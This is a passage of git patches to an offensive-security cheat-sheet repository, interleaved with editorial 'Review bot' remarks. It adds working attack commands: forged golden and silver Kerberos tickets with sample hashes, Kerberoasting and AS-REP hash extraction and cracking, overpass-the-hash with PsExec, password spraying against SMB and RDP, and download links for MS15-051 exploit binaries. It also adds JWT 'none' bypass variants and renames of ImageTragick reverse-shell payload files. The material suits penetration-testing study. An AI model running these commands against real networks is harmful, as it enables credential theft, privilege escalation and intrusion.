/root/Downloads/pentestlabuser.tck 
@@ -426,40 +428,51 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck kerberos_ticket_list ``` -Using a ticket on Linux +#### Using a ticket on Linux ```powershell -Convert the ticket kirbi to ccache with kekeo +# Convert the ticket kirbi to ccache with kekeo misc::convert ccache ticket.kirbi -Alternatively you can use ticketer from Impacket +# Alternatively you can use ticketer from Impacket ./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519 ./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519 - export KRB5CCNAME=/home/user/ticket.ccache cat $KRB5CCNAME - -NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file +# NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` -### PassTheTicket Silver Tickets +If you need to swap ticket between Windows and Linux, you need to convert them with `ticket_converter` or `kekeo`. 
+ +```powershell +root@kali:ticket_converter$ python ticket_converter.py velociraptor.ccache velociraptor.kirbi +Converting ccache => kirbi +root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi velociraptor.ccache +Converting kirbi => ccache +``` + +### Pass-the-Ticket Silver Tickets Forging a TGS require machine accound password (key) from the KDC ```powershell -Create a ticket for the service -kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE -/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt +# Create a ticket for the service +mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE -Then use the same steps as a Golden ticket -misc::convert ccache ticket.kirbi -export KRB5CCNAME=/home/user/ticket.ccache -./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 +# Examples +mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt +mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park + +# Then use the same steps as a Golden ticket +mimikatz $ misc::convert ccache ticket.kirbi + +root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache +root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` ### Kerberoast 
@@ -483,7 +496,7 @@ $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c1 Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus) ```powershell -.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD +.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt ``` Then crack the ticket with hashcat or john @@ -499,7 +512,7 @@ If a domain user does not have Kerberos preauthentication enabled, an AS-REP can ```powershell C:\>git clone https://github.com/GhostPack/Rubeus#asreproast -C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user +C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast ______ _ (_____ \ | | @@ -527,6 +540,19 @@ v1.3.4 [*] AS-REP hash: $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)... + +C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast +``` + +Using `impacket` to get the hash and `hashcat` to crack it. + +```powershell +# extract hashes +root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast +root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast + +# crack AS_REP messages +root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt ``` ### Pass-the-Hash @@ -565,22 +591,30 @@ sekurlsa::pth /user: /domain: /ntlm:.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt +C:\Users\triceratops>.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd +``` + ### Capturing and cracking NTLMv2 hashes If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. 
@@ -817,26 +851,29 @@ Password spraying refers to the attack method that takes a large number of usern > The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. -Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. +#### Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. + +> Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771). ```powershell root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 +root@kali:~$ python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt ``` -Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. +#### Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. ```powershell crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` ``` -Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services. +#### Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services. ```powershell python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP] ``` -Using [hydra]() and [ncrack]() to target RDP services. +#### Using [hydra]() and [ncrack]() to target RDP services. ```powershell hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10 
@@ -950,4 +987,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) * [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) -* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) \ No newline at end of file +* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) +* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 7b14c770..e01d4be8 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -213,6 +213,14 @@ cat /etc/cron.allow cat /etc/cron.deny* ``` +You can use [pspy](https://github.com/DominicBreuker/pspy) to detect a CRON job. + +```powershell +# print both commands and file system events and scan procfs every 1000 ms (=1sec) +./pspy64 -pf -i 1000 +``` + + ## Systemd timers ```powershell diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 4873b3db..d8fa2cd3 100644 --- a/Methodology and Resources/Windows - Persistence.md 
+++ b/Methodology and Resources/Windows - Persistence.md @@ -1,5 +1,18 @@ # Windows - Persistence +## Summary + +* [Userland](#userland) + * [Registry](#registry) + * [Startup](#startup) + * [Scheduled Task](#scheduled-task) +* [Elevated](#elevated) + * [HKLM](#hklm) + * [Services](#services) + * [Scheduled Task](#scheduled-task) +* [References](#references) + + ## Userland ### Registry diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 12f24dca..e093f984 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -424,6 +424,7 @@ Scheduled tasks ```powershell schtasks /query /fo LIST 2>nul | findstr TaskName +schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State ``` @@ -698,6 +699,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n ### Juicy Potato (abusing the golden privileges) Binary available at : https://github.com/ohpe/juicy-potato/releases +:warning: Juicy Potato doesn't work in Windows Server 2019. 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 0061badc..fa30aa67 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md 
@@ -1,5 +1,23 @@ # MSSQL Injection +## Summary + +* [MSSQL comments](#mssql-comments) +* [MSSQL version](#mssql-version) +* [MSSQL database name](#mssql-database-name) +* [MSSQL List databases](#mssql-list-database) +* [MSSQL List columns](#mssql-list-columns) +* [MSSQL List tables](#mssql-list-tables) +* [MSSQL Extract user/password](#mssql-extract-user-password) +* [MSSQL Union Based](#mssql-union-based) +* [MSSQL Error Based](#mssql-error-based) +* [MSSQL Blind Based](#mssql-blind-based) +* [MSSQL Time Based](#mssql-time-based) +* [MSSQL Stacked query](#mssql-stack-query) +* [MSSQL Command execution](#mssql-command-execution) +* [MSSQL UNC path](#mssql-unc-path) +* [MSSQL Make user DBA](#mssql-make-user-dba) + ## MSSQL comments ```sql @@ -19,14 +37,14 @@ SELECT @@version SELECT DB_NAME() ``` -## MSSQL List Databases +## MSSQL List databases ```sql SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); — for N = 0, 1, 2, … ``` -## MSSQL List Column +## MSSQL List columns ```sql SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only @@ -35,7 +53,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master. SELECT table_catalog, column_name FROM information_schema.columns ``` -## MSSQL List Tables +## MSSQL List tables ```sql SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views @@ -45,7 +63,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master. SELECT table_catalog, table_name FROM information_schema.columns ``` -## MSSQL User Password +## MSSQL Extract user/password ```sql MSSQL 2000: 
@@ -137,6 +155,13 @@ EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; ``` +To interact with the MSSQL instance. + +```powershell +sqsh -S 192.168.1.X -U sa -P superPassword +python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758 +``` + ## MSSQL UNC Path MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash. diff --git a/SQL Injection/README.md b/SQL Injection/README.md index e238323a..8099f6df 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -52,6 +52,7 @@ Simple characters %3B ) Wildcard (*) +' # required for XML content ``` Multiple encoding From 3fd0791c2a864d9a077043d7b571a1a603b6db89 Mon Sep 17 00:00:00 2001 From: David B <44925796+TH3xACE@users.noreply.github.com> Date: Mon, 19 Aug 2019 00:55:30 +0200 Subject: [PATCH 043/222] Update Linux - Privilege Escalation.md Adding a tool that helps with privilege escalation on linux through SUDO. --- Methodology and Resources/Linux - Privilege Escalation.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index e01d4be8..047a338f 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -20,6 +20,7 @@ - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) +- [Privilege Escalation through sudo - Linux](https://github.com/TH3xACE/SUDO_KILLER) ## Summary 
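Review bot: In the `CVE Exploits/README.md` hunk, the fence is changed from `bash` to `powershell` although both commands are POSIX shell (`echo -e`, `curl`, `/dev/tcp`), so the `bash` tag was the correct one. The `echo -e "HEAD /cgi-bin/status ..."` line only prints the request and is not piped anywhere (no `| nc host 80`), so as written it sends nothing; the added closing `"` does fix the unterminated string from the previous version.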
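Review bot: The new `Bypass "../" with ";"` entry in `Directory Traversal/README.md` gives no condition for when `..;/` works; the example targets `page.jsp`, so say on which server or container this behaviour was observed and that the defence is to normalise the path (strip path parameters) before the traversal check rather than after. Without that, readers cannot tell whether the trick applies to their stack.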
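Review bot: In the Golden Tickets hunk of `Active Directory Attack.md`, `Forging a TGT require the krbtgt NTLM hash` should read `requires`. The added blockquote explains Golden Tickets by reference to the Silver Ticket procedure and `ticketer.py` (`no service SPN must be specified to ticketer.py`), but Silver Tickets are only introduced in the section below and `ticketer.py` only under `Using a ticket on Linux`, so either move the quote next to the `ticketer.py` lines or reword it so it stands on its own here.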
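Review bot: In the `@@ -426,40 +428,51 @@` hunk, the first `# Examples` line reads `mimikatz $ /kerberos::golden ...` with a stray leading `/` before the module name (the line above correctly uses `kerberos::golden`), which mimikatz will not parse. Two typos in the same hunk: `Forging a TGS require machine accound password` should be `requires ... machine account password`, and `swap ticket between Windows and Linux` should be `swap tickets`. The sentence also introduces `ticket_converter` without a link while every other tool in this file is linked; add the project URL.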
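Review bot: In the AS-REP roasting hunk (`@@ -527,6 +540,19 @@`), `hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt` passes `--force`, which only suppresses hashcat's warnings and is not needed for mode 18200; drop it so readers do not copy it as a required flag. The added `C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast` line runs john from the Rubeus directory prompt, which reads as if john shipped with Rubeus; a neutral prompt would avoid that.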
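Review bot: The lines added in the `### Pass-the-Hash` hunk (`Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:... /ptt` followed by `PsExec.exe -accepteula \\labwws02.jurassic.park cmd`) request a Kerberos TGT from the NT hash, which is overpass-the-hash (pass-the-key) rather than NTLM pass-the-hash; label the sub-block accordingly. The distinction matters for anyone using this page to write detections, since this path produces Kerberos TGT traffic rather than NTLM logons.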
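Review bot: In the password spraying hunk, the new `#### Using kerbrute, a tool to perform Kerberos pre-auth bruteforcing.` headings carry a whole sentence and a trailing period; shorten them to the tool name (`#### kerbrute`, `#### crackmapexec`, ...) and keep the description as body text. The added `python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt` line uses a different option syntax from the `./kerbrute_linux_amd64` binary above it, so it is a different project and should be named and linked separately. The `[hydra]()` and `[ncrack]()` links promoted to headings here are still empty. The added note that pre-auth failures log as event 4771 rather than 4625 is a useful detection caveat and worth keeping.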
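Review bot: The pspy block in `Linux - Privilege Escalation.md` is fenced as `powershell` although `./pspy64 -pf -i 1000` is a Linux command; `bash` is the right tag. The comment `scan procfs every 1000 ms (=1sec)` does match `-i 1000`, and the extra blank line before `## Systemd timers` leaves two empty lines where the rest of the file uses one.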
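Review bot: In the `Windows - Persistence.md` summary, both the Userland and the Elevated `Scheduled Task` entries link to `#scheduled-task`; with two identically named headings GitHub gives the second one the anchor `#scheduled-task-1`, so the Elevated entry currently jumps to the Userland section. Point it at the suffixed anchor.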
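Review bot: The line added to the scheduled tasks block of `Windows - Privilege Escalation.md` writes `schtasks.txt` but then reads `schtask.txt` (missing `s`), so the pipeline fails as written. `cat ... | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM` also will not run in cmd.exe or plain PowerShell; either mark it as a post-processing step on a Linux host or rewrite it with `findstr` / `Select-String`.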
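Review bot: Several anchors in the new `MSSQL Injection.md` summary do not match their headings: `#mssql-list-database` vs `## MSSQL List databases` (renamed in this same patch, so the slug is `#mssql-list-databases`), `#mssql-stack-query` vs `MSSQL Stacked query` (`#mssql-stacked-query`), and `#mssql-extract-user-password` where GitHub drops the `/` from `Extract user/password` and produces `#mssql-extract-userpassword`.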
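Review bot: In the `@@ -137,6 +155,13 @@` hunk, `To interact with the MSSQL instance.` is a sentence fragment; `To interact with the MSSQL instance directly:` reads better as a lead-in. The `mssqlclient.py` target `WORKGROUP/Administrator:password@192.168.1X` is missing a dot (`192.168.1.X`), and the block mixes placeholder styles (`192.168.1.X` with `superPassword`, then a literal `password`); pick one placeholder convention.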
@@ -309,6 +310,7 @@ uid=0(root) gid=1000(swissky) ``` ## SUDO +Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER) ### NOPASSWD @@ -662,4 +664,4 @@ https://www.exploit-db.com/exploits/18411 - [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) -* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) \ No newline at end of file +* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) From 6c161f26b23dc6ffeb0a3e6ebfc8b70333b60ce3 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 22 Aug 2019 23:03:48 +0200 Subject: [PATCH 044/222] JWT None alternative + MS15-051 --- JSON Web Token/README.md | 6 ++++++ .../Windows - Privilege Escalation.md | 18 ++++++++++++++++++ 2 files changed, 24 insertions(+) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 7452986a..9d83b6be 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -72,6 +72,12 @@ JWT Encoder – Decoder: `http://jsonwebtoken.io` JWT supports a None algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application. +None algorithm variants: +* none +* None +* NONE +* nOnE + To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT. However, this won't work unless you **remove** the signature 
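Review bot: This patch adds the same SUDO_KILLER repository twice under different titles (`Privilege Escalation through sudo - Linux` in the tools list, `Sudo Exploitation` under `## SUDO`); keep one title for both, and insert a blank line between `## SUDO` and the `Tool:` line so the heading renders cleanly. In the references hunk the touched line keeps a `*` bullet while its neighbours use `-`; since the line is being edited anyway for the trailing newline, switch it to `-`.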
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index e093f984..9401316f 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -25,6 +25,7 @@ * [MS08-067 (NetAPI)](#ms08-067-netapi) * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7) * [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003) + * [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012) * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) * [References](#references) @@ -775,6 +776,23 @@ Python: https://www.exploit-db.com/exploits/18176 Metasploit: exploit/windows/local/ms11_080_afdjoinleaf ``` +### MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012 + +```powershell +printf("[#] usage: ms15-051 command \n"); +printf("[#] eg: ms15-051 \"whoami /all\" \n"); + +# x32 +https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe + +# x64 +https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe + +https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051 +use exploit/windows/local/ms15_051_client_copy_image +``` + + ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) Check if the patch is installed : `wmic qfe list | findstr "3139914"` From 7b6c8d46aac53aff8fcced7dfae9cded5343dd29 Mon Sep 17 00:00:00 2001 From: Jonathan Leitschuh Date: Wed, 28 Aug 2019 13:56:55 -0400 Subject: [PATCH 045/222] Add dot filter bypass with decimal IP --- XSS Injection/README.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) 
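Review bot: In the `JSON Web Token/README.md` hunk the `None algorithm variants` list (`none`, `None`, `NONE`, `nOnE`) states the variants but not why they matter; add one sentence that a check which rejects only the lowercase `none` is insufficient when the library compares `alg` case-insensitively, so the defensive rule is to allow-list the expected algorithm rather than deny-list `none`.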
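Review bot: In the new `MS15-051 (Client Copy Image)` section, the two `printf("[#] usage: ms15-051 command \n");` lines are C source copied from the exploit, not something the reader types; replace them with the usage they print (`ms15-051 "whoami /all"`). The summary anchor `#ms15-051---microsoft-windows-2003--2008--7--8--2012` will not resolve: the heading has no spaces around its slashes and contains `(Client Copy Image)`, so the generated slug is along the lines of `#ms15-051-client-copy-image---microsoft-windows-20032008782012`; either match the anchor to the heading or reformat the heading like the existing `MS16-032` one (`7 < 10 / 2008 < 2012 R2`). The mix of prebuilt `.exe` download links and `use exploit/windows/local/ms15_051_client_copy_image` also deserves a line saying which is the Metasploit route and which is a third-party binary.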
diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 3a5a9f5b..6bd8aa15 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -557,6 +557,9 @@ You can bypass a single quote with ' in an on mousedown event handler ``` +Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` +http://www.geektools.com/cgi-bin/ipconv.cgi + ### Bypass parenthesis for string ```javascript @@ -1043,4 +1046,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/) - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) -- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) \ No newline at end of file +- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) From bb305d0183f26a620893e13fa20a77ef44e7e2ab Mon Sep 17 00:00:00 2001 
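Review bot: `Convert IP address into decimal format: IE.` should read `e.g.` (it introduces an example, not a restatement), and the entry is inserted directly after the single-quote / `onmousedown` code block with no heading of its own, before `### Bypass parenthesis for string`; give it a `### Bypass dot filter` heading as the commit title suggests and state that it lets a URL pass a filter that blocks `.`. The value itself is correct: 192·2^24 + 168·2^16 + 1·2^8 + 1 = 3232235777. The `geektools.com` converter link would read better as a markdown link with a label than as a bare URL.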
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 29 Aug 2019 01:08:26 +0200 Subject: [PATCH 046/222] Network Discovery - Masscan update --- .../Metasploit - Cheatsheet.md | 11 +++++++++++ Methodology and Resources/Network Discovery.md | 17 +++++++++++++++-- .../Network Pivoting Techniques.md | 9 ++++++++- .../Windows - Privilege Escalation.md | 4 ++-- .../README.md | 0 .../imagemagik_ghostscript_reverse_shell.jpg | 0 ...mageover_file_exfiltration_pangu_wrapper.jpg | 0 ...imageover_file_exfiltration_text_wrapper.jpg | 0 ...1_payload_imageover_reverse_shell_devtcp.jpg | 0 ...load_imageover_reverse_shell_netcat_fifo.png | 0 .../imagetragik1_payload_imageover_wget.gif | 0 .../imagetragik1_payload_url_bind_shell_nc.mvg | 0 .../imagetragik1_payload_url_curl.png | 0 .../imagetragik1_payload_url_portscan.jpg | 0 ...agetragik1_payload_url_remote_connection.mvg | 0 ...getragik1_payload_url_reverse_shell_bash.mvg | 0 .../imagetragik1_payload_url_touch.jpg | 0 ..._payload_xml_reverse_shell_nctraditional.xml | 0 ...payload_xml_reverse_shell_netcat_encoded.xml | 0 .../imagetragik2_burpcollaborator_passwd.jpg | 0 .../imagetragik2_centos_id.jpg | 0 .../imagetragik2_ubuntu_id.jpg | 0 .../imagetragik2_ubuntu_shell.jpg | 0 .../imagetragik2_ubuntu_shell2.jpg | 0 24 files changed, 36 insertions(+), 5 deletions(-) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/README.md (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagemagik_ghostscript_reverse_shell.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg (100%) rename Upload Insecure 
Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_imageover_wget.gif (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_bind_shell_nc.mvg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_curl.png (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_portscan.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_remote_connection.mvg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_reverse_shell_bash.mvg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_touch.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_xml_reverse_shell_nctraditional.xml (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik2_burpcollaborator_passwd.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik2_centos_id.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik2_ubuntu_id.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik2_ubuntu_shell.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik2_ubuntu_shell2.jpg (100%) diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index 4ce0db76..3fb5bad8 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md 
+++ b/Methodology and Resources/Metasploit - Cheatsheet.md @@ -10,6 +10,7 @@ * [Meterpreter Webdelivery](#meterpreter-webdelivery) * [Get System](#get-system) * [Persistence Startup](#persistence-startup) + * [Network Monitoring](#network-monitoring) * [Portforward](#portforward) * [Upload / Download](#upload---download) * [Execute from Memory](#execute-from-memory) @@ -130,6 +131,16 @@ OPTIONS: meterpreter > run persistence -U -p 4242 ``` +### Network Monitoring + +```powershell +# list interfaces +run packetrecorder -li + +# record interface n°1 +run packetrecorder -i 1 +``` + ### Portforward ```powershell diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index ab07f1a4..10a6b63e 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md 
